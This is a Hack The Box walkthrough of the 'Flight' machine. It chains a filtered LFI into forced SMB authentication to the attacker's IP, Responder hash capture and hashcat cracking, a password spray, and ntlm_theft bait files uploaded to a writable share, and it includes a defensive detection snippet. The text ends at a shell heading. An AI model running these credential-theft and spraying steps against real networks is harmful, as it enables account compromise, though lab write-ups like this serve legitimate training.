Flight | HTB
Machine - https://app.hackthebox.com/machines/Flight
IP - 10.10.11.187
NMAP
└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49667,49673,49674,49694,49719 10.10.11.187 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-19 14:12 IST
Nmap scan report for 10.10.11.187
Host is up (0.31s latency).
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-19 15:42:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time: 
|   date: 2025-08-19T15:44:03
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 7h00m02s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.69 seconds
Port 53
└─$ dig any @10.10.11.187 flight.htb                 
; <<>> DiG 9.20.8-6-Debian <<>> any @10.10.11.187 flight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24195
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;flight.htb.                    IN      ANY
;; ANSWER SECTION:
flight.htb.             600     IN      A       192.168.22.180
flight.htb.             3600    IN      NS      g0.flight.htb.
flight.htb.             3600    IN      SOA     g0.flight.htb. hostmaster.flight.htb. 41 900 600 86400 3600
;; ADDITIONAL SECTION:
g0.flight.htb.          3600    IN      A       10.10.11.187
g0.flight.htb.          3600    IN      AAAA    dead:beef::23d
g0.flight.htb.          3600    IN      AAAA    dead:beef::d139:bc2b:d648:e9eb
;; Query time: 359 msec
;; SERVER: 10.10.11.187#53(10.10.11.187) (TCP)
;; WHEN: Tue Aug 19 14:23:04 IST 2025
;; MSG SIZE  rcvd: 191
Port 80

For some reason I am unable to do directory enumeration.

Let's try subdomain enumeration instead.
└─$ wfuzz -c -u http://flight.htb/ -H "Host: FUZZ.flight.htb" -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hc 302,400,301,404 --hw 530
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://flight.htb/
Total requests: 484699
=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                                                                     
=====================================================================
000000264:   200        90 L     412 W      3996 Ch     "school"                                                                                                                                                                                                    
Total time: 373.8789
Processed Requests: 384
Filtered Requests: 383
Requests/sec.: 1.027070
 /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:78: UserWarning:Fatal exception: Pycurl error 28: Operation timed out after 90000 milliseconds with 0 bytes received
Let's add school.flight.htb to our hosts file and visit it.

Let's run a directory enumeration on the new host.
└─$ dirsearch -u http://school.flight.htb/ -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                                                             
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                             
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Flight/reports/http_school.flight.htb/__25-08-19_19-33-33.txt
Target: http://school.flight.htb/
[19:33:33] Starting:                                                                                                                                                                                                                                                         
[19:34:22] 200 -    2KB - /about.html                                       
[19:35:00] 200 -    2KB - /cgi-bin/printenv.pl                              
[19:35:15] 503 -  406B  - /examples                                         
[19:35:15] 503 -  406B  - /examples/
[19:35:15] 503 -  406B  - /examples/jsp/index.html
[19:35:15] 503 -  406B  - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[19:35:15] 503 -  406B  - /examples/jsp/snp/snoop.jsp
[19:35:15] 503 -  406B  - /examples/servlet/SnoopServlet
[19:35:15] 503 -  406B  - /examples/servlets/index.html                     
[19:35:15] 503 -  406B  - /examples/servlets/servlet/RequestHeaderExample   
[19:35:15] 503 -  406B  - /examples/websocket/index.xhtml
[19:35:15] 503 -  406B  - /examples/servlets/servlet/CookieExample
[19:35:24] 301 -  347B  - /images  ->  http://school.flight.htb/images/
[19:35:26] 200 -    3KB - /home.html                                        
[19:35:28] 200 -    4KB - /images/                                          
[19:36:11] 301 -  347B  - /styles  ->  http://school.flight.htb/styles/
                                                                             
Task Completed
On visiting http://school.flight.htb/cgi-bin/printenv.pl we find the CGI environment, which discloses the XAMPP paths and, in PATH, the svc_apache profile the web server runs under:
COMSPEC="C:\Windows\system32\cmd.exe"
CONTEXT_DOCUMENT_ROOT="/xampp/cgi-bin/"
CONTEXT_PREFIX="/cgi-bin/"
DOCUMENT_ROOT="C:/xampp/htdocs/school.flight.htb"
GATEWAY_INTERFACE="CGI/1.1"
HTTP_ACCEPT="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
HTTP_ACCEPT_ENCODING="gzip, deflate"
HTTP_ACCEPT_LANGUAGE="en-US,en;q=0.5"
HTTP_CONNECTION="keep-alive"
HTTP_HOST="school.flight.htb"
HTTP_PRIORITY="u=0, i"
HTTP_UPGRADE_INSECURE_REQUESTS="1"
HTTP_USER_AGENT="Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
MIBDIRS="/xampp/php/extras/mibs"
MYSQL_HOME="\xampp\mysql\bin"
OPENSSL_CONF="/xampp/apache/bin/openssl.cnf"
PATH="C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\svc_apache\AppData\Local\Microsoft\WindowsApps"
PATHEXT=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC"
PHPRC="\xampp\php"
PHP_PEAR_SYSCONF_DIR="\xampp\php"
QUERY_STRING=""
REMOTE_ADDR="10.10.14.7"
REMOTE_PORT="47730"
REQUEST_METHOD="GET"
REQUEST_SCHEME="http"
REQUEST_URI="/cgi-bin/printenv.pl"
SCRIPT_FILENAME="C:/xampp/cgi-bin/printenv.pl"
SCRIPT_NAME="/cgi-bin/printenv.pl"
SERVER_ADDR="10.10.11.187"
SERVER_ADMIN="postmaster@localhost"
SERVER_NAME="school.flight.htb"
SERVER_PORT="80"
SERVER_PROTOCOL="HTTP/1.1"
SERVER_SIGNATURE="<address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 Server at school.flight.htb Port 80</address>\n"
SERVER_SOFTWARE="Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1"
SYSTEMROOT="C:\Windows"
TMP="\xampp\tmp"
WINDIR="C:\Windows"
Looking at the blog pages, the URL was interesting:

When we try to access files through that parameter, we get this:

It looks like some filtering is in place.
Foothold/shell
Shell as ?
Auth as svc_apache
LFI
When trying / instead of \ we get the result:

This confirms that the LFI is there.
RFI test
Let's see whether allow_url_include is enabled.
Unfortunately, the remote file was treated as plain text rather than executed as PHP.

NTLM hash over SMB
We already know that the target is a Windows host with SMB running. What if we tell the web server to include a path on a share on our machine? If everything goes well, it should try to authenticate to our SMB server, and we should be able to capture its Net-NTLMv2 hash and then crack it.
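As an added example (not code from this writeup), here is the web-side picture of what the previous sections show, in Python: a filter that rejects only backslashes still hands a forward-slash UNC path to include(), an allowlist resolver does not, and the same request pattern can be flagged in Apache access logs. The docroot is the one printenv.pl reported above; ALLOWED_PAGES, the log lines and the function names are constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Docroot as shown by /cgi-bin/printenv.pl on this page; the page allowlist is assumed.
DOCROOT = "/xampp/htdocs/school.flight.htb"
ALLOWED_PAGES = {"index.html", "home.html", "about.html"}

# Leading UNC prefix in either slash style (\\host\share or //host/share), or a URL scheme.
UNC_RE = re.compile(r"^(\\\\|//)[^/\\]+")
URL_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)

# Apache combined log: client, identity, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def weak_filter(view: str) -> bool:
    """Models the filter observed on the page: a backslash is rejected, nothing else is.
    Returns True when the value would be passed on to include()."""
    return "\\" not in view


def is_unc_or_url(view: str) -> bool:
    """True when the value would make include() reach outside the docroot: a UNC path
    (an SMB round-trip, hence the Net-NTLMv2 capture) or a remote URL (RFI)."""
    v = unquote(view)
    return bool(UNC_RE.match(v) or URL_RE.match(v))


def safe_resolve(view: str):
    """Allowlist replacement for the weak filter: accept only a bare file name from
    ALLOWED_PAGES and return its path inside DOCROOT, or None for anything else."""
    v = unquote(view)
    if is_unc_or_url(v) or "/" in v or "\\" in v or v not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(DOCROOT, v))
    # Belt and braces: the joined path must still sit under the docroot.
    return path if path.startswith(DOCROOT + "/") else None


def suspicious_view_requests(log_lines):
    """Detection side: return (client_ip, decoded view value, reason) for every request
    whose view= parameter is a UNC path or a URL, the pattern used to make the server
    authenticate outbound or include a remote file."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for view in parse_qs(query).get("view", []):  # parse_qs already percent-decodes
            if is_unc_or_url(view):
                reason = "rfi-url" if URL_RE.match(view) else "unc-path"
                hits.append((m.group("ip"), view, reason))
    return hits


# Constructed access-log lines (not from the box) covering a normal page load,
# both UNC spellings and an RFI attempt against the same view= parameter.
SAMPLE_LOG = [
    '10.10.14.7 - - [19/Aug/2025:15:40:01 +0000] "GET /index.php?view=home.html HTTP/1.1" 200 3996',
    '10.10.14.7 - - [19/Aug/2025:15:41:12 +0000] "GET /index.php?view=//10.10.14.7/test HTTP/1.1" 200 0',
    '10.10.14.7 - - [19/Aug/2025:15:41:40 +0000] "GET /index.php?view=%5C%5C10.10.14.7%5Ctest HTTP/1.1" 200 0',
    '10.10.14.7 - - [19/Aug/2025:15:42:05 +0000] "GET /index.php?view=http://10.10.14.7/rfi.txt HTTP/1.1" 200 41',
    '10.10.14.7 - - [19/Aug/2025:15:42:30 +0000] "GET /cgi-bin/printenv.pl HTTP/1.1" 200 1700',
]

if __name__ == "__main__":
    unc = "//10.10.14.7/test"
    print("weak filter lets UNC through:", weak_filter(unc))      # True
    print("allowlist resolver accepts it:", safe_resolve(unc))    # None
    print("allowlist resolver on home.html:", safe_resolve("home.html"))
    for ip, view, reason in suspicious_view_requests(SAMPLE_LOG):
        print(f"{ip} requested view={view!r} [{reason}]")
```

The detector only needs the access log, so it works after the fact as well as on a live tail, and it catches both slash spellings because parse_qs decodes the query before the match.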
Let's start our responder:
└─$ sudo responder -I tun0
and force the web server to connect to our share:
http://school.flight.htb/index.php?view=//10.10.14.7/test
We can see the hash on our responder:
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash     : svc_apache::flight:f3eb77a70d216d<--SNIP-->
Let's try to crack it:
└─$ hashcat hashes.txt -m 5600 /home/anurag/stuff/rockyou.txt
<--SNIP-->
SVC_APACHE::flight:f3eb77a70d216d60:4052c5b0e782a6292c794b3036b90c8e:<--SNIP-->:S@Ss!K@*t13
<--SNIP-->
LDAP and SMB were both able to authenticate with the cracked password:
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u svc_apache -p  'S@Ss!K@*t13'; echo; done
LDAP        10.10.11.187    389    G0               [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP        10.10.11.187    389    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13
Let's enumerate the shares, since LDAP was not possible:
└─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                          
                                                                                                                             
[+] IP: 10.10.11.187:445        Name: flight.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Shared                                                  READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY
        Web                                                     READ ONLY
[*] Closed 1 connections
Users and Web look interesting; let's connect and see what is inside.
└─$ smbmap -H 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' -r --dir-only
[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
                                                                                                                             
[+] IP: 10.10.11.187:445        Name: flight.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        ./NETLOGON
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    .
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    ..
        Shared                                                  READ ONLY
        ./Shared
        dr--r--r--                0 Sat Oct 29 01:51:28 2022    .
        dr--r--r--                0 Sat Oct 29 01:51:28 2022    ..
        SYSVOL                                                  READ ONLY       Logon server share 
        ./SYSVOL
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    .
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    ..
        dr--r--r--                0 Fri Sep 23 01:17:44 2022    flight.htb
        Users                                                   READ ONLY
        ./Users
        dw--w--w--                0 Fri Sep 23 01:46:56 2022    .
        dw--w--w--                0 Fri Sep 23 01:46:56 2022    ..
        dr--r--r--                0 Fri Sep 23 00:58:03 2022    .NET v4.5
        dr--r--r--                0 Fri Sep 23 00:58:02 2022    .NET v4.5 Classic
        dr--r--r--                0 Tue Nov  1 00:04:00 2022    Administrator
        dr--r--r--                0 Wed Jul 21 01:49:19 2021    All Users
        dr--r--r--                0 Fri Sep 23 01:38:23 2022    C.Bum
        dw--w--w--                0 Wed Jul 21 00:50:24 2021    Default
        dr--r--r--                0 Wed Jul 21 01:49:19 2021    Default User
        dw--w--w--                0 Wed Jul 21 00:53:25 2021    Public
        dr--r--r--                0 Sat Oct 22 00:20:21 2022    svc_apache
        Web                                                     READ ONLY
        ./Web
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    .
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    ..
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    flight.htb
        dr--r--r--                0 Wed Aug 20 03:17:01 2025    school.flight.htb
[*] Closed 1 connections
Users looks like the C:\Users directory.
Nothing was there; they look like empty directories.
Password spray
We found the usernames:
└─$ netexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' -d flight.htb --users                                                                           
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               -Username-                    -Last PW Set-       -BadPW- -Description-                                               
SMB         10.10.11.187    445    G0               Administrator                 2022-09-22 20:17:02 0       Built-in account for administering the computer/domain 
SMB         10.10.11.187    445    G0               Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.10.11.187    445    G0               krbtgt                        2022-09-22 19:48:01 0       Key Distribution Center Service Account 
SMB         10.10.11.187    445    G0               S.Moon                        2022-09-22 20:08:22 0       Junion Web Developer 
SMB         10.10.11.187    445    G0               R.Cold                        2022-09-22 20:08:22 0       HR Assistant 
SMB         10.10.11.187    445    G0               G.Lors                        2022-09-22 20:08:22 0       Sales manager 
SMB         10.10.11.187    445    G0               L.Kein                        2022-09-22 20:08:22 0       Penetration tester 
SMB         10.10.11.187    445    G0               M.Gold                        2022-09-22 20:08:22 0       Sysadmin 
SMB         10.10.11.187    445    G0               C.Bum                         2022-09-22 20:08:22 0       Senior Web Developer 
SMB         10.10.11.187    445    G0               W.Walker                      2022-09-22 20:08:22 0       Payroll officer 
SMB         10.10.11.187    445    G0               I.Francis                     2022-09-22 20:08:22 0       Nobody knows why he's here 
SMB         10.10.11.187    445    G0               D.Truff                       2022-09-22 20:08:22 0       Project Manager 
SMB         10.10.11.187    445    G0               V.Stevens                     2022-09-22 20:08:22 0       Secretary 
SMB         10.10.11.187    445    G0               svc_apache                    2022-09-22 20:08:23 0       Service Apache web 
SMB         10.10.11.187    445    G0               O.Possum                      2022-09-22 20:08:23 0       Helpdesk 
SMB         10.10.11.187    445    G0               [*] Enumerated 15 local users: flight
Let's copy them and perform a password spray:
└─$ netexec smb 10.10.11.187 -u username.txt -p 'S@Ss!K@*t13' -d flight.htb --continue-on-success
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE 
SMB         10.10.11.187    445    G0               [+] flight.htb\svc_apache:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
Auth as S.Moon
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u S.Moon -p  'S@Ss!K@*t13'; echo; done
LDAP        10.10.11.187    389    G0               [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP        10.10.11.187    389    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13
LDAP was not possible, so let's enumerate the shares:
└─$ netexec smb flight.htb -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\S.Moon:S@Ss!K@*t13 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ
We have read and write permission on the Shared share.
NTLM Theft File upload
We cannot upload a text file (maybe some filtering?):
smb: \> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \test.txt
smb: \>
But we can upload a file with an extension the filter does not know:
smb: \> put test.txt
NT_STATUS_ACCESS_DENIED opening remote file \test.txt
smb: \> put test.php
NT_STATUS_ACCESS_DENIED opening remote file \test.php
smb: \> put test.unknown
putting file test.unknown as \test.unknown (0.0 kb/s) (average 0.0 kb/s)
smb: \>
Let's try to perform NTLM theft via file upload.
└─$ python3 ntlm_theft/ntlm_theft.py --generate all --server 10.10.16.3 --filename test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
Now start the responder and upload the generated files:
└─$ smbclient -U 'S.Moon%S@Ss!K@*t13' //10.10.11.187/Shared
Try "help" to get a list of possible commands.
smb: \> prompt false
smb: \> mput *
NT_STATUS_ACCESS_DENIED opening remote file \zoom-attack-instructions.txt
putting file test-(fulldocx).xml as \test-(fulldocx).xml (12.0 kb/s) (average 12.0 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \test-(includepicture).docx
NT_STATUS_ACCESS_DENIED opening remote file \test-(externalcell).xlsx
NT_STATUS_ACCESS_DENIED opening remote file \test-(remotetemplate).docx
NT_STATUS_ACCESS_DENIED opening remote file \Autorun.inf
putting file desktop.ini as \desktop.ini (0.0 kb/s) (average 10.3 kb/s)
putting file test-(stylesheet).xml as \test-(stylesheet).xml (0.2 kb/s) (average 9.1 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \test.wax
NT_STATUS_ACCESS_DENIED opening remote file \test.scf
NT_STATUS_ACCESS_DENIED opening remote file \test.m3u
NT_STATUS_ACCESS_DENIED opening remote file \test.lnk
NT_STATUS_ACCESS_DENIED opening remote file \test-(frameset).docx
putting file test.application as \test.application (1.0 kb/s) (average 7.7 kb/s)
putting file test.jnlp as \test.jnlp (0.1 kb/s) (average 6.5 kb/s)
NT_STATUS_ACCESS_DENIED opening remote file \test.asx
NT_STATUS_ACCESS_DENIED opening remote file \test.rtf
NT_STATUS_ACCESS_DENIED opening remote file \test.htm
NT_STATUS_ACCESS_DENIED opening remote file \test.pdf
NT_STATUS_ACCESS_DENIED opening remote file \test-(url).url
NT_STATUS_ACCESS_DENIED opening remote file \test-(icon).url
smb: \>
On responder, we get the hash:
└─$ sudo responder -I tun0
<--SNIP-->
[+] Listening for events...                                                                                                                                                                                                                                                   
[SMB] NTLMv2-SSP Client   : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash     : c.bum::flight.htb:439d3511943fe1c<--SNIP-->
Auth as C.Bum
Let’s crack the hash
└─$ hashcat hashes.txt -m 5600 /home/anurag/stuff/rockyou.txt
<--SNIP-->
C.BUM::flight.htb:439d3511943fe1c7:e7f929a94b09ce2e9698d13bc54a1c0e:0101000000000000000205335911dc01110a12c6d1cd55a70000000002000800320049003100560001001e00570049004e002d0038003800310034003400360046003700460051005a0004003400570049004e002d0038003800310034003400360046003700460051005a002e0032004900310056002e004c004f00430041004c000300140032004900310056002e004c004f00430041004c000500140032004900310056002e004c004f00430041004c0007000800000205335911dc010600040002000000080030003000000000000000000000000030000027bdb9cb60f2c561e130226ad1cd3f4e3d60e016ba8f1a7d4a1b215fbd32e7d10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0033000000000000000000:Tikkycoll_431012284
We can use LDAP and SMB as C.BUM:
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto 10.10.11.187 -d flight.htb -u C.BUM -p  'Tikkycoll_431012284'; echo; done
LDAP        10.10.11.187    389    G0               [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
LDAP        10.10.11.187    389    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284
It looks like we can read and write on Web:
└─$ netexec smb flight.htb -u C.BUM -p 'Tikkycoll_431012284' --shares                                    
SMB         10.10.11.187    445    G0               [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.187    445    G0               [+] flight.htb\C.BUM:Tikkycoll_431012284 
SMB         10.10.11.187    445    G0               [*] Enumerated shares
SMB         10.10.11.187    445    G0               Share           Permissions     Remark
SMB         10.10.11.187    445    G0               -----           -----------     ------
SMB         10.10.11.187    445    G0               ADMIN$                          Remote Admin
SMB         10.10.11.187    445    G0               C$                              Default share
SMB         10.10.11.187    445    G0               IPC$            READ            Remote IPC
SMB         10.10.11.187    445    G0               NETLOGON        READ            Logon server share 
SMB         10.10.11.187    445    G0               Shared          READ,WRITE      
SMB         10.10.11.187    445    G0               SYSVOL          READ            Logon server share 
SMB         10.10.11.187    445    G0               Users           READ            
SMB         10.10.11.187    445    G0               Web             READ,WRITE
And it is the share backing the website:
└─$ smbclient -U 'C.BUM%Tikkycoll_431012284' //10.10.11.187/Web   
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Aug 20 05:52:01 2025
  ..                                  D        0  Wed Aug 20 05:52:01 2025
  flight.htb                          D        0  Wed Aug 20 05:52:01 2025
  school.flight.htb                   D        0  Wed Aug 20 05:52:01 2025
                5056511 blocks of size 4096. 1249940 blocks available
smb: \>
Let's try to upload a text file:
smb: \flight.htb\> put test.txt
putting file test.txt as \flight.htb\test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \flight.htb\> ls
  .                                   D        0  Wed Aug 20 05:54:16 2025
  ..                                  D        0  Wed Aug 20 05:54:16 2025
  css                                 D        0  Wed Aug 20 05:52:01 2025
  images                              D        0  Wed Aug 20 05:52:01 2025
  index.html                          A     7069  Thu Feb 24 11:28:10 2022
  js                                  D        0  Wed Aug 20 05:52:01 2025
  test.txt                            A        5  Wed Aug 20 05:54:16 2025
                5056511 blocks of size 4096. 1249940 blocks available
smb: \flight.htb\>
Shell as svc_apache
